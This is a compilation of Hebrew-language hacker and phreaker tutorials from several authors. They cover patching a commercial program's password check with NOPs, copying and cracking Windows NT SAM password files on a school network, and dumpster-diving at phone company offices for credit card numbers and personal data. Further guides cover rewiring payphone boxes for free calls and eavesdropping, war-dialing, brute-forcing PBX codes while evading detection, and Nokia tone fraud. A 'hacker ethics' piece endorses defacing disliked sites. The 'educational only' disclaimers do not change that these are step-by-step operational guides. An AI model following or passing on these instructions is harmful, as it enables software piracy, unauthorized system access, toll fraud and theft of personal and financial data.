במדריך זה למדת (אם הצלחת) איך להמיר מבסיס 10 לבסיס 16 ולהפך. אני יודע שזה לא סיפור גדול אבל אתה תראה שזה יכול להשתלם לך אם תחליט ללמוד אסמבלר באופן מלא ,כמובן שאפשר פשוט להשתמש בממיר בסיסים שניתן להוריד כמעט מכל מקום אבל אפילו המפצחים המנוסים ביותר נוהגים יותר להתעסק עם זה לבד כי זה יותר מאתגר כנראה וגם כמו שכתוב בהתחלה זה בסיס לדברים יותר מורכבים.

 

במדריך הבא שלי (על הקסה)  אכתוב כיצד ניתן לחבר , לחסר לכפול או לחלק מספרים מבסיס 16 ותלמד גם על חשיבות המספרים השליליים והמשלימים ל 2 (המדריך מסתמך על ידע בבסיס בינארי) .

 

By Zeos
המדריך לפיצוח מעשי של הגנת סיסמא

 

מאת: Zeos

 

שלום לכם, זהו כבר המדריך השני שאני כותב בנוגע לקראקינג . בעקבות הודעות שהשאירו לי בפורום בנוגע לפיצוח הגנת סיסמא החלטתי לכתוב את מדריך זה וכן גם בשביל שממש תוכל להתנסות ולפצח תוכנית אמיתית.

 

הערה: המדריך נוצר לצורכי לימוד בלבד! , כל פעולה לא חוקית שתעשה או כל נזק שיגרם למחשבך עקב כל פעילות על סמך המדריך הנה על אחריותך בלבד!, המדריך מוסבר בצורה תיאורטית וכל פעולה לא חוקית שתנקוט כתוצאה מכל סוג של שימוש הנה על אחריותך האישית בלבד. אם אתה מעוניין לנצל את הפיצוח למטרות רווח אנא הפסק לקרוא.

 

חלק 1 – הכלים והידע

טוב , אז למדריך הזה אתה  חייב (!) ידע באסמבלי , בלי ידע אתה תתקע... עדיף שתלמד מספרים או באינטרנט קצת ואז חזור לכאן (רק ידע בסיסי למדריך זה , עדיף שתדע קצת על אוגרים, פונקציות השוואה ובסיסים).

 הכלים שנשתמש הם כלים די נפוצים:

1.               W32 דיסאמבלר מעולה חובה בכל בית בישראל :)

2.               Hworks (HEX WORKSHOP) עורך הקסדצימלי (מציג את הקבצים בבסיס 16) אם אתה יודע להשתמש טוב בכל עורך אחר, בבקשה.

ניתן להשיג את הקבצים כמעט בכל מקום באינטרנט...

 

חלק 2 – המטרה

בשביל שלא יהיה קשה , סיירתי באתרי קראקינג ומצאתי קובץ די נפוץ שמלמדים עליו איך לפרוץ . תוכנה ממש קלה וחביבה שלמפצח הבינוני לא צריך לקחת יותר מ 5 דקות לפצח.

לתוכנה קוראים : Sweet Little Piano  וניתן להוריד אותה מהכתובת הבאה

http://www.ronimusic.com/swlipi32.zip

 

חלק 2 – בדיקת הודעות מערכת

קדימה לעבודה! , אחרי שהרצנו את התוכנה לראשונה נפתחו לנו 2 דברים : בהתחלה תיבת הודעה שאומרת :

Note! You must supply your user ID when ordering

User ID:   xxxx

 

ש xxxx הוא המספר רשיון שלך. אחרי שתלחץ על OK יפתח לך מסמך ORDER.TXT וכן גם תיבה המבקשת את הסיסמא שלך שבה רשום בכותרת "Enter Your Password” ומקום להכניס סיסמא. הקש משהו שטותי כל מספר שעולה על דעתך ואמורה להיפתח לך הודעת שגיאה (כמה לא מפתיע) שבה רשום

 Not a valid password ובכותרת רשום

- User ID xxxx Sweet Little Piano  

 הקלק על OK שוב ותכנס לגרסה הלא מלאה של התוכנית.

אז מה היה לנו כאן :

התוכנית פתחה לך מקום לרשום סיסמא בהתאם למספר זיהוי שהונפק לך (User ID) ולאחר מכן להשוות באמצעות אלגוריתם מסוים את הסיסמא למספר זיהוי , אך אתה שמת מספר לא נכון וקיבלת הודעת שגיאה .

 

חלק 3 – בודקים את הקוד

טוב , בוא נראה מה קורה בתוך התוכנית: פתח את W32 ופתח בו את קובץ ה EXE של התוכנית...הנה אחת הסיבות למה בחרתי דווקא את התוכנית הזאת – היא קטנה מה שאומר שכנראה יהיה לנו פחות בלגן להתעסק וזה טוב :) . עכשיו קלטו מה נעשה – בוא נלחץ על STRN.REF (ליד הכפתור של ההדפסה) ונחפש את השורה שמראה לנו כי הבדיקה לא נכונה כלומר את המשפט:    Not a valid password

מצאנו? יופי לחצו עליו ואמור להיפתח לכם משהו כזה:

 

* Reference To: USER32.GetDlgItemTextA, Ord:0000h

                                  |

:00401E54 E8EBBA0000              Call 0040D944

:00401E59 E83EFEFFFF              call 00401C9C

:00401E5E 85C0                    test eax, eax

:00401E60 741E                    je 00401E80

:00401E62 6A30                    push 00000030

 

                                  |

:00401E64 68FCE14000              push 0040E1FC

 

                                  |

:00401E69 68ADE14000              push 0040E1AD

:00401E6E 53                      push ebx

 

                                  |

:00401E6F E812BB0000              Call 0040D986

:00401E74 C70568E2400001000000    mov dword ptr [0040E268], 00000001

:00401E7E EB1A                    jmp 00401E9A

 

|:00401E60©

|

:00401E80 6A30                    push 00000030

 

                                  |

:00401E82 68FCE14000              push 0040E1FC

 

                                  |

:00401E87 68E3E14000              push 0040E1E3

:00401E8C 53                      push ebx

 

 

 

אחרי שהתאוששת מהבלגן הזה והצלחת למצוא את הקטעים עליהם אני מדבר , אז בוא ותראה מה קורה לנו פה:  לפי השיגרה

* Reference To: USER32.GetDlgItemTextA, Ord:0000h

                                  |

:00401E54 E8EBBA0000              Call 0040D944   { קריאה לפונקציה}

:00401E59 E83EFEFFFF              call 00401C9C  {קריאה לפונקציה }

:00401E5E 85C0                    test eax, eax  (מבחן השוואה}

:00401E60 741E                    je 00401E80 {קפיצה אם שווה! }

:00401E62 6A30                    push 00000030

 

ישנם 4 משפטים , משפטים אחד ושתיים קוראים לפונקציה , לא מעניין. משפט שלישי עורך מבחן מסוים בין שני האוגרים EAX אבל זה לא כל כך משנה לנו כי זה פיצוח אלגוריתם של הסיסמה ואנחנו לא מתעסקים עם זה כעת ואילו במשפט הרביעי (מסומן בירוק) ישנה קפיצה אם שווה – זה JE לשיגרה שאומרת כי ההרשמה הצליחה. עכשיו בוא נחשוב , מה היה קורה אילו התוכנית הייתה עושה מבחן השוואה והפקודה JE לא הייתה שם? אז התוכנית הייתה נרשמת בהצלחה. אז יאללה קדימה בוא נלך ונשמיד אותה!!!!

 

חלק 4 – נטרול פקודת ההשוואה

אם קראת את המדריך הראשון שלי תראה כי גם פה אני מנטרל את פקודת ההשוואה באמצעות פקודת NOP

= NO OPERATION  , אבל יש בעיה קטנטנה ומעצבנת שפקודת JE תופסת שני בתים ופקודת NOP תופסת בייט אחד , ולכן נכניס רק 2 פקודות NOP ולא ארבע כמו שעשינו במדריך הקודם.

שים לב לטיפשות של המתכנת :) שעשה "מספר סידורי" כדי שתתבלבל ולא תמצא את השיגרה, אל תדאג אם מספרי השורות בדיסאמבלר שלך לא שוות למה ששלי... פשוט עקוב אחרי משפטי התוכנית שבראש (מסומנים בכחול) ותמצא אותם בהתאם ל"מספר סידורי" שלך.

 

אז בדוק ב  W32שלך את המספר  OFFSET של הפקודה JE שלך (שוב פעם, אל תתייחס אם זה לא דומה לשלי) ולאחר שרשמת אותו (ללא ה – H ) לך לעורך ההקסדצימלי שלנו HWORKS .

קדימה קפוץ לשורה באמצעות פקודת GOTO (אלט וf5 ) אל המספר שרשמת והקלד פעמיים 90 (זאת הפקודה NOP בהקסדצימלי) . שמור את הקובץ...

 

חלק 5 – פיצחתי ! פיצחתי!! אני גבר!!!
תפעיל את התוכנית ואם עשית הכל נכון תראה שלא משנה איזה מספר תקיש ההרשמה תהיה חוקית. מזל טוב , אני אישית גאה בך שפיצחת את התוכנית הראשונה שלך – רוץ בכל הבית ותצעק "פיצחתי ! פיצחתי!" כמו שאני עשיתי בפעם הראשונה שהצלחתי  :)

 

אם אתה רוצה להמשיך ולהיות מפצח אתה חייב לדעת שחלק מהיותך מפצח זה ללמוד שפות תכנות שונות, למד ככל שתוכל ואז תוכל לקבל שליטה על כל מה שמתבצע בתוך תוכנית מכל סוג ומכל שפה ולנתב אותה לפי רצונך וזאת בעצם התכלית של הקראקינג.

 

 

מקווה שנהנית מהמדריך - Zeos

 

 

פריצת סיסמאות בWindows NT

 

אהלן!

E-man כאן.

 

אז מה?

בית ספר החליט להתקין WinNT? יופי... שיחנקו אייתו.

והכי טוב שאתם תחנקו אותם נכון?

 

במה להצטייד?

 

ציוד חובה:

- דיסקט

 

ציוד רשות:

- דיסקט NTFSDOS

- NT Resource Kit

אז ככה:

 

איך לחפש את קובץ הסיסמאות?

פשוט ככה:

 

אם זה WinNT 4.0 ומטה, חפשו את הקובץ _.Sam

אם זה WinNT5.0 ומעלה, חפש את הקובץ Sam

 

מהו ה-SAM?

 

ראשי התיבות של SAM הם Security Accounts Manager

או בעברית: מנהל אבטחת חשבונות.

 

יש כמה שיטות לפרוץ את הקובץ הזה.

 

שיטה 1: תנסו להשיג את התוכנה R-DISK. זאת לא תוכנת פריצה, תוכנה זאת, של מיקרוסופט בעצמה, מגבה את כל המידע הנחוץ של מערכת ההפעלה על דיסקט. זה

כולל גם סיסמאות! פשוט השתמשו בתוכנה על מנת להשיג את הקובץ.

 

שיטה 2: הסיסמאות הכי מעודכנות נמצאות בתיקיה Winnt/System32/Config. גם כן הם על _.Sam או על Sam.

אבל למשתמש רגיל, מה שאנחנו (בינתיים) אין גישה לשם.

אל דאגה! פשוט השתמשו בדיסקט NTFSDOS כשאתם עושים Restart.

עכשיו תוכלו להכנס לספריה הזאת ולהעתיק את הקובץ לדיסקט.

 

שיטה 3: עותק של הסיסמאות נמצא גם בRegistry, אבל משתמש רגיל לא יכול להכנס אליו.

מה אפשר לעשות? להשתמש בתוכנה (שוב, מבית מיקרוסופט) RegBack.exe מה NT Resource Kit שמעתיקה את הסיסמאות לדיסקט.

 

שיטה 4:

*** שיטה זאת מיועדת רק למומחים ולאלה שלא מוותרים בקלות.

בקובץ הSwap של WinNT מאוחסנות הסיסמאות בטקסט רגיל! אבל שוב, אי אפשר לחפש בו כי המערכת משתמשת בו.

מה עושים? משתמשים בNTFSDOS כדי להכנס לDOS ומעתיקים את הקובץ Swapfile.sys למקום אחר על ההארד דיסק.

** שימו לב: מעתיקים! לא מעבירים!

נכנסים לווינדוס ופשוט מחפשים בקובץ כשמשתמשים בNotePad כדי לקרוא אותו.

 

לשיטה 1, 2 ו3:

עכשיו, כשיש לנו את הקובץ, אנחנו צריכים לפצח אותו. הסיסמאות בתוכו מקודדות ואי אפשר להשתמש בהם ככה.

מה עושים? מורידים תוכנה בשם L0phtCrack מwww.l0pht.com ועוקבים אחרי ההוראות בה איך להתחיל את תהליך הפיצוח.

 

עכשיו לכו לשחק עם החתול, להציק לאחות או סתם להמשיך לקרוא בזמן שהסיסמאות מופיעות לאט לאט מול עינכים.

 

By E-man.

 

 

האתיקה של ההאקרים עפ"י Razor\Oldhacker

 

“They don't care about us”

 Micheal Jackson

 

1. אל תהיה אף פעם צבוע - להיות צבוע זה הדרגה הכי שפלה שיש באדם , תהיה אמיתי , אם אתה רוצה לומר למישהו אמת אמור לו את זה בפנים ואל תרמוז או תנסה להעביר את המסר ברמזים , אמור זאת חד וחלק בפנים !.

 

2. אל תשקר -  בעולם ההאקינג ובחיים בכלל אנשים שונאים שקרים , פעם אחת ידעו ששיקרת יעיפו אותך מכל חברה שיש במיוחד בהאקינג שצריך אמינות רבה .

 

3. אל תגנוב אף פעם כסף או רכוש מאדם - לדוגמה אל תגנוב מספרי אשראי של אנשים או חשבונות בנקים ותשמש בהם לרע . זכורמה ששלמה ארצי שר :  פוליטיקאים וגנבים הם ...:-) .

 

4. אל תתנשא - אל תתנשא בפני אף אחד על הדברים שלמדת מאחרים ואל הדברים שאתה יודע בכלל אלא למד את מי שלא יודע כמו שלימדו אותך וכמו שהספר הזה עושה , זכור : תמיד יש מישהו שיודע יותר טוב ממך , ובכלל כל המטרה של ההאקרים זה להפיץ את הידע בחינם לכל דורש .

 

5. הזהר ורק אח"כ בצע - אם אתה רוצה לפרוץ לאתר שאותו אתה לא כל כך אוהב  הזהר את בעל האתר ואמור לו שיוריד את האתר מהרשת ואם הוא לא עושה את דבריך פרוץ את האתר בלי רגשות אשמה .

 

6. תהיה בן אדם - זכור שהקהילה של האינטרנט היא חברה בדיוק כמו בחיים אלא שברשת אתה אנונומי ולמרות זה תתנהג כמו בן אדם ולא כמו פרא .

 

7.בשביל כבוד צריך לעבוד .

 

8. זכור : " מעפר באת ולעפר תשוב " .

 

By Razor \  Old-Hacker

 

 

שקר \ אמת - פריקינג

 

שקר: תופעת הפריקינג מתה.

אמת: תופעת הפריקינג היא בדעיכה רצינית, אפשר להגיד גוססת, היא לא מה שהייתה בעבר.

 

שקר: קופסות פריקרים לא עובדות יותר (BOXES).

אמת: כמעט כל הקופסאות לא עובדות אבל יש כמה שעובדות תחת התנאים הנכונים.

 

שקר: פריקינג טוב/מגניב יותר מהאקינג.

אמת: גם האקינג/פריקינג, שניהם סוגים של אומנות ממוחשבת ואין דבר כזה טוב יותר מהשני.

 

שקר: פריקינג זה דבר רע ואסור.

אמת: פריקינג זה דבר רע ואסור רק אם עושים בזה שימוש מוטעה ומכוון להרוס דברים.

 

שקר: אין שימוש לפריקיג, למה צריך את זה בכלל ?

אמת: פריקינג יכול להיות שימושי מאוד והוא נותן לך ידע על מערכות טלפון שאתה משתמש בהם כל יום.

 

שקר: הנושא העיקרי של פריקינג הוא רק קופסאות.

אמת: כל יום כאשר נוצרת מערכת טלפון חדשה, יש תת-נושא חדש לפריקינג,

     איך לעבוד איתה ומה אפשר לעשות איתה, ידע חדש על מערכת חדשה.

 

שקר: פריקינג הוא בטיחותי ביותר.

אמת: לא נכון, תמיד יש סיכוי שתתחשמל בזמן ביצוע מעשה כלשהו, תמיד צריך להיזהר.

 

שקר: כשאני עושה מעשה פריקינג כלשהו, אין לי סיכוי להיתפס.

אמת: גם לא נכון, תמיד יש סיכוי שמישהו יראה אותך, יתקשר ל 100 ואתה נתפס ואוכל אותה.

 

שקר: פריקינג זה לא חוקי.

אמת: זה דווקא אמת.

 

שקר: אם אני אקרא את הטקסט הזה אני אהיה פריקר טוב.

אמת: שוב לא נכון, הטקסט נועד להסביר לכם מעט מידע על פריקינג ואיך להיזהר במעשיכם.

 

By Prising

חיפוש במזבלות לפריקרים

 

חיפוש במיזבלות לפריקרים

 

אתר המקור: www.ihc-net.org

 

הערות: אני וצוות האתר לא אחראים לכל שימוש לרעה בטקסט.

החומר כאן הוא למטרות לימודיות בלבד ואין לבצע את המתואר בטקסט.

 

מה זה חיפוש במיזבלות לפריקרים?

הכוונה הוא לחיפוש לניירות (לא בשום דבר מגעיל אני מקווה) במקומות שבהם אפשר

למצוא מידע לפריקרים/האקרים (בעיקר במשרדי חברת הטלפון).

 

למה לי? מה אני ימצא?

אפשר למצוא הרבה דברים, חלקם לפריקרים וחלקם להאקרים. הנה רשימה חלקית:

* ניירות עם מספרי ניסוי של חברת הטלפון.

* ניירות עם תיאור השיחות ממספר מסויים.

* מספרי תעודת-זהות ושאר פרטים אישיים של אנשים שונים.

* מספרי כרטיסי אשראי של אנשים אחרים על פיתקיות.

* מספרי חיוג לרשת שאתה לא אמור לדעת עליהם.

 

מה צריך?

////////

& חולצה ישנה ארוכה, נעליים ישנות וזוג מכנסיים ישנים. (הכול בצבע כהה)

& פנס

& תיק גדול לניירות

& Walkie Talkie

& חברים (בין 2-6) לפחות אחד נמצא בתצפית עם walkie talkie

 

אוקי, אז מה אני עושה כדי להשיג את זה?

(((((((((((((((((()))))))))))))))))))

 

קודם כול לך למקום שאתה רוצה לחפש בו (עדיף משרדים של בזק/ חברות טלפון סלולרי) בזמן האור ותראה איך המקום נראה, מאיפה נכנסים ואם יש שומרים בחוץ או מנעולים.

בלילה לאחר מכן, לך למקום ותיכנס למיזבלה.

שם אתה תראה המון פחים גדולים אחד ליד השני, פתח אותם ותסתכל פנימה.

רוב מה שתראה הוא נייר, ומה שאתה צריך זה ניירות אז קח הרבה ניירות לתוך התיק וצא מהמקום.

כשאתה מגיע הביתה תסתכל על מה שלקחת, זרוק את הדברים הלא חשובים לפח זבל ברחוב כלשהו (לא שלך)

וקח את הדברים המעניניים באמת.

אם תמצא דברים מעניניים ממש תוכל לסרוק את זה ולשלוח לי, פינת הפריקינג זקוקה לדברים כאלה!

 

מה אם...

תירוצים לשהייה במיזבלה:

# איבדתי את הכדורגל שלי כאן.

# אני מחפש ניירות/אלומיניום למיחזור.

# אני צריך חוטי טלפון לפרויקט שלי במדעים.

# אין לי מקום לישון.

בכל מקרה, אם תופסים אותך ומבינים מה אתה עושה,

אתה יכול להיות מואשם בחציית גבול ולא בשום פשע רציני.

 

תמיד שלכם,

By AiTi

TNI BOX

 

                                                               TNI Box

                                                             =======

 

נכתב על ידי - Boba Smith

Version - 4.0

>>> www.ihc-net.org <<<

 

הערה

----

 

טקסט זה נכתב למטרות לימודיות בלבד

אין לי שום אחריות לכל נזק שנגרם עקב קריאת טקסט זה

 

 

תוכן עניינים

------------

 

1. מה זה ה TNI Box

2. מה אפשר לעשות איתה

3. איך אפשר למצוא כאלה קופסאות ?

4. נתחיל

5. הערות

6. קרדיטים

 

 

1. מה זה ה TNI Box

------------------

 

ה TNI Box זאת קופסא ( לא כמו הקופסאות Blue וכל אלה )

שנמצאת ליד טלפון על מטבעות ( קשה למצוא כאלה קופסאות , הקופסאות יכולות

להיות מרוחקות מהטלפון )

TNIולחפש את הקופסת ה

 

2. מה אפשר לעשות איתה

---------------------

 

כאשר אתה מוצא את הקופסא אתה יכול לשנות את הקו לקו אמיתי ( לחשבון אמיתי

בבזק , ולא סתם איזה טלפון מזוין על מטבעות )

 

 

3. איך אפשר למצוא כאלה קופסאות ?

--------------------------------

 

את הקופסאות האלה אתה יכול למצוא ליד טלפונים על מטבעות ( המרחק יכול

להיות רחוק מאד , וזה גם יכול להיות קרוב מאד ) .

אם נגיד את הולך לטלפון ואתה רואה מן כזה חוט לאינשהוא תעקוב אחריו ,

או אם אתה רואה מן כזה חור שעליו נכנס חוט , אז תנסה לעקוב אחריו .

 

 

 

 

4. נתחיל

--------

 

1. לך תחפש את הקופסא ותפתח אותה אם הכלים שאתה צריך .

2. אחרי שאתה פותח אותה אתה אמור לראות מן כאלה כבלים

   שרשום שם את המספרי טלפון .

   עכשיו , תחפש את המספר של הטלפון על המטבעות ואז תחליף

   אותו למספר אחר ( למספר רגיל ) .

3. תלך לטלפון שאותו שיניתה לטלפון הרגיל ותתקשר חופשי לכל מקום בחינם .

 

 

5. הערות

--------

 

1. השיטה הזאת זה כמו Beige Box , זה נותן לך שיחות חינם

   ונותן לך לצותת לטלפון שעליו עליתה .

2. שאתה מתחבר לקו הרגיל , אז תתקשר ל 110 זה ישמיע לך את המספר

   טלפון שעליו התחברת .

3. אם נגיד אחרי שעשיתה את כל הקטע אם הקופסא , שאתה תלך להתקשר

   לא יוכלו לחשוד בך , אתה תראה כאילו שאתה מתקשר רגיל .

By Boba Smith

רשימת המספרים המיוחדים והקידומות של נזק

 

 

          &&& תודה שחייגתם, נזק, נזק &&&      

 

 

הערות: בקבוצה שלנו לא עושים מעשים בלתי-חוקיים וכל מידע כאן

הוא למטרות לימודיות בלבד ו^^אין^^ לבצע את האמור בטקסט.

קובץ זה הורד במקור מ www.ihc-net.org ואני חלק מקבוצה זה.

 

רשימת המספרים:

100 - משטרה

101 - מגן דויד אדום

102 - מכבי האש

103 - חברת החשמל

199 - שירות לקוחות של נזק

198 - פקס לשירות לקוחות של נזק

 

110 - ANI לטכנאי נזק

175 - שירות יקיצה של נזק

171 - רשות הדואר, שירות מברקים

166 - שירות תיקונים של נזק

164 - שירות תיקונים מיוחדים של נזק

135 - שירות נזקנט, אינטרנט מזדמן

136 - שירות אינטרנט מיוחד, שימוש לחברות שונות

151# - התא קולי של הקו אליו אתה מחובר

153 - שליחת פקסים לשירות תא קולי

1822/1838/1848/188 - מרכזייה בינלאומית

131 - ישראנט, תמסורת ממוחשבת

144 - מודיעין

142 - שירות גוביינא אוטומטית

155 - השעון הדובר

146 - מידע על מספרי טלפון מוחלפים

106 - מוקד עירוני

72  - הפעלת שירות עקוב אחרי

73  - ביטל שירות עקוב אחרי

 

כוכביות וסולמיות:

 

42* - חייג לאחרון שהתקשר אליך

41* - שירות "חנייה" של נזק, למקרה שיש מספר תפוס

43* - ביטל אפשרות *42 ושיחה מזוהה למי שאתה מתקשר אליו

73* - עקוב אחרי במקרה שתפוס

74* - עקוב אחרי במקרה שתפוס או שאין מענה

#73 - ביטול 73*

#74 - ביטול 74*

 

קידומות:

 

1800 - שיחת חינם

177 - שיחת חינם, לא עובד ברוב אזורי הארץ

1700 - שיחה מכל הארץ בתשלום

012 - קוי זהב

013 - ברק

014 - נזק בינלאומי

1212 - שיחה מכל הארץ בתשלום

02 - אזור ירושלים ויהודה ושומרון

03 - אזור גוש דן והמרכז

04 - אזור חיפה והצפון

08 - אזור השפלה והדרום

----  למקרה שאתם מכירים עוד מספרים, אנא פנו אלי!  ----

 

תמיד שלכם,

By AiTi

סריקת מספרי 1800

 

מה זה בכלל exhange scanning?

exhange scanning זה כמו דפיקה על כל הבתים ברחוב מסוים רק שהפעם משתמשים בטלפון.

אתה בעצם סורק אזור מסוים של מספרי טלפון, נגיד מ1800-300-000 עד 1800-300-999 ומחפש מספרים מענינים שאתה מוצא.

אפשר למצוא מספרי ניסוי שונים של חברת הטלפון, מספרי מודמים שניתן להתחבר אליהם (בעיקר להאקרים) ועוד מספרים מענינים שונים.

 

מה אני צריך כדי לסרוק?

# מחשב שיש בו מודם והוא מחובר לטלפון

# את התוכנה Phone Tag שניתן למצוא באתר.

 

הורדתי את התוכנה, מה עכשיו?

קודם כל תפתח את התוכנה. אתה תראה את המסך הבא:

 


תלחץ על File – New dial list ותקבל את המסך הבא:

עכשיו אתה צריך לבחור את טווח המספרים שאתה רוצה לבדוק אותם.

אני ממליץ לנסות מספרים של 1800, אבל הבחירה בידיכם.

הקישו את התבנית שאתה רוצים, לחצה על X תהיה כמו לחיצה על כל המספרים.


לחצו על OK ואז על

והמודם יתחיל לחייג

בזמן שהוא מחייג אתם תראו על המסך את התוצאות.

כל מספר שנרשם כתפוס רוב הסיכויים שאין כזה מספר.

תרשמו כל מספר שלא נרשם כתפוס אלא נרשם כcarrier או כ No carrier

ולאחר מכן תתקשרו לכל המספרים הלא-תפוסים ותבדקו מה יש בהם.

 

הערות: טקסט זה הוא למטרות לימודיות בלבד ואין להשתמש בו.

אני לא ממליץ לחייג מעל 500 מספרים ביום אחד, בזק יכולה לעלות על זה.

אחרי כל סריקה שאתם עושים אתם שולחים את התוצאות אלי.

ותזכרו: זה חיוג חינם, אז תתחילו לסרוק!

 

By AiTi

PBX

 

פעם (לפני 5 שנים בערך) השתמשו הרבה אנשים בקודים שפורסמו בBBS כדי לעשות שיחות חינם,

אני מקווה שבטקסט זה אני "יחזיר עטרה ליושנה" (אוף... אני שונא את ש"ס)

 

מה זה בכלל כל הדברים האלו?

---------------------------

קודם כל צריך להבין שפי.בי.אקס זה לא מאריך, ומאריך זה לא פי.בי.אקס, לפעמים מתבלבלים בשמות האלו מכיוון שהם משמשים לאותה מטרה:  לעשות שיחות חינם

 

מאריך בדרך כלל שייך לחברת שיחות בינלאומיות גדולה (בזק בינלאומי, קווי זהב, ברק) או חברת טלפון בינלאומית,

למאריך בדרך כלל יש שתי מטרות:

1. שאנשים המשלמים על השירות יוכלו להתקשר למספרי טלפון בעזרת קוד מסויים (כמו בזקכרט...)

2. להוות מספר שאליו מתקשרים כאשר מוכרים לך כרטיס חיוג חד-פעמי, בו אתה מתקשר למספר כלשהוא, מקיש את הקוד ומתקשר.

 

כל מספרי המאריכים נמצאים באזור החיוג חינם של 1800, ולא תוכל למצוא מאריכים  באזורי חיוג אחרים.

 

כדי למצוא מאריך כדי להשתמש בשיטת הסריקה שכתבתי עליה טקסט,

אם אתה מוצא מספר שכאשר אתה מתקשר אליו הוא נותן לך צליל חיוג, יש 99% שמצאת מאריך.

כמו כן מספר המבקש ממך את הקוד לחיוג, חייב להיות מאריך.

 

קודם כל צריך למצוא כמה ספרות יש בקוד, אבל בדרך כלל הקול האוטמוטי יגיד לך: "אנא הכנס את הקוד בעל ה8 ספרות שלך" וכך תדע כמה ספרות יש,

אך לפעמים לא ינתנו לך שום רמזים על מספר הסיפרות.

 

אוקי, עכשיו לפי.בי.אקס!

בדרך כלל פי.בי.אקס יהיה שייך לאיזו חברה גדולה, שבדרך כלל יש לה מרכזייה.

(דוגמא: לאוניברסיטאות בטוח יש פי.בי.אקס מכיוון שהם גדולות, יש בהם לרוב שירות לעובדים של להתקשר למספר כלשהוא, לתת קוד ולהתקשר למישהוא בנושא עבודה, ותמיד יש לאוניברסיטאות מרכזייה)

 

בדרך כלל האנשים בחברה יצטרכו לחייג 9, או כל סיפרה אחרת כדי לקבל צליל חיוג.

 

הפי.בי.אקס הוא בעצם מספר, שעובדים בחברה אמורים להתקשר אליו ולהקיש את הקוד שלהם, ואז הם יוכלו לחייג חינם למישהוא, למטרות עסקים.

 

פי.בי.אקס יכולים להימצא גם באזורי חיוג רגילים (03,04,08) וגם באזור חיוג של שיחות חינם (1800).

מאריכים יכולים בדרך כלל להתקשר רק למספרים בתוך הארץ,

לעמות זאת,  פי.בי.אקסים יכולים להתקשר לכל מקום בעולם.

 

חלק 2: איך לא להתגלות בפריצה למערכות האלה

=========================================

 ל 99% מהמאריכים יש את האפשרות לאתר ברגע, ולמצוא את מי שהתקשר, לכן מאוד קשה/מסוכן לפרוץ אליהם בלי שמנהלי המערכת לא ישימו לב.

 

היתרון של פי.בי.אקסים הוא שלרובם אין דרך מהירה לאתר, ןהדרך היחידה לאתר את המתקשר היא לבדוק את הרישומים אצל בזק (CAMA= סרט מגנטי המתעד כל מספר שאליו התקשרת, אמור לשמש למטרות חיוב, אך עדיין ניתן לאתר בעזרתו את המתקשר, הוא קיים במערכות טלפון חדשות בלבד)

 

מה לא לעשות: ( או: איך פריקרים נתפסים על הדברים האלה)

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

1. אל תנסה קודים אחד אחרי השני לפי הסדר (0001,0002,0003,0004...) אלא תערבבו את הקודים כך שיהיו בסדר רנדומלי.

2. אל תחייגו לאותו פי.בי.אקס/מאריך 400 פעמים בשעה אחת, בדרך כלל ישימו לב לזה....

3. שלא יהיו הפרשים קבועים בזמן בין השיחות, אלא הפרשים רנדומלים.

 

הדרך הכי טובה היא למצוא את הקוד בעזרת הטלפון, ללא שימוש במחשב אלא לנסות קודים רבים בעצמך בזמן שאתה רואה סאות' פארק....

 

אם אתה מוצאים קודים, אל תשתגעו ואל תביאו אותם לכל אחד, כי כך הם ימותו מהר מאוד...

 

By AiTi

 

 

המדריך ליצירת צלילים בנוקיה

 

הערות:

-====-

מדריך זה נכתב לצורכי לימוד בלבד, ואין הכותב נושא אחריות כלשהי עקב קריאת מדריך זה.

 

מצרכים:

=======

נוקיה מהסוג היישן 2120\2160 - אם אתם לא יודעים על מה אני מדבר, זה הנוקיה המרובה והדוחה שהיה לכל הארץ לפני איזה שנתיים...

ידיים

מוח

 

הסבר:

=====

בנוקיה **21 לא לקחו בחשבון שיהיה מישהו משועמם שייגלה שיטה שהם משתמשים בה לצורכי מחקר ובדיקה...

מה נותנת לנו השיטה?

השיטה מאפשרת בעת הצמדת השפורפרת לטלפון מטבעות, להתקשר חינם לכל מקום בעולם...

 

פעולה:

======

תפעילו את המכשיר, לחצו על:

Menu

ויישר על הכפתור

SND

אחר כך הוא יגיד לכם:

Location Number:

הכוונה למספר הזיכרון שאותו אתם רוצים לשמוע בצלילים [DTMF].

נגיד אנחנו רוצים לחייג ליוסי, שנמצא אצלינו במספר זיכרון 33.

אז אנחנו מקישים 33 ולוחצים על OK

עכשיו יש לנו אפשרות ללחוץ על DTMF שהוא בעצם הכפתור של התפריט...

ואיזה פלא...המכשיר מפיק את צלילי המספרים של הטלפון של יוסי...

עכשיו מה שנותר לנו, זה למצוא טלפון מטבעות [שקלים] ולהצמיד אליו את הרמקול של הפלאפון וגמרנו...

אתם צריכים לשמוע צליל חיבור...

תנסו את השיטה על הטלפון בבית, זה אמור לעבוד מכל מקום...והשיטה עובדת מעולה!!!

 

מה שכן, זה שצריך להיזהר שלא ייתפסו אותכם...כי אז אתם יכולים להיות עצורים על גניבה!

אבל אל חשש....פשוט תגידו שאתם משמיעים לחבר שלכם את ההודעה שהחברה המחורמנת שלכם השאירה לכם אתמול בלילה...

 

חשוב לציין: השיטה נמצאה ביידיי...ואם היא לא תעבוד אצלכם, אז תשאירו לי הודעה בפורום...ועוד משהו...סתם שתדעו...שרוב הטלפונים האלה נמצאים בפיצוחיות הקטנות ובקיוסקים...בדרך כלל בחוץ, ובקניונים בצורת טלפון גדול ובדרך כלל בצבע צהוב...תהנו

 

לסיכום:

-------

נוקיה לא חשבה על זה שמישהו יימצא את השיטה ויידע איך להשתמש בה ולאיזה צורך..., אבל נוקיה טעתה...אבל בדגמי הנוקיה החדשים האפשרות הזאת מבוטלת...כנראה הם קיבלו קצת שכל האנשים...

 

לפריקרים:

=========

אתם יכולים עכשיו ליצור את ה HERTZ שאתם צריכים בפשטות רבה...בלי שום טייפים ובלאגנים...למרות שהטייפ הטוב והיישן עדיין שולט בנו...

 

By CnTaX

רשימת  הקופסאות השונות ותפקידם:

 

Acrylic Box - *אמור לגנוב שיחה ממתינה, שיחה מזוהה וששיחת ועידה במערכות טלפון ישנות

 

Beige Box - שימוש בקו הטלפון של מישהו אחר ללא רשותו, אחד מהכלים של טכנאי בזק.

 

Black Box - *מי שיתקשר אליך כאשר אתה משתמש בקופסא זו לא יחוייב על השיחה.

 

Blotto Box - אמור להרוס כל מערכת טלפון באזור, אל תשתמשו בזה!

 

Blue Box - *משתמש בטונים כדי לקבל שיחות חינם לכל העולם.

 

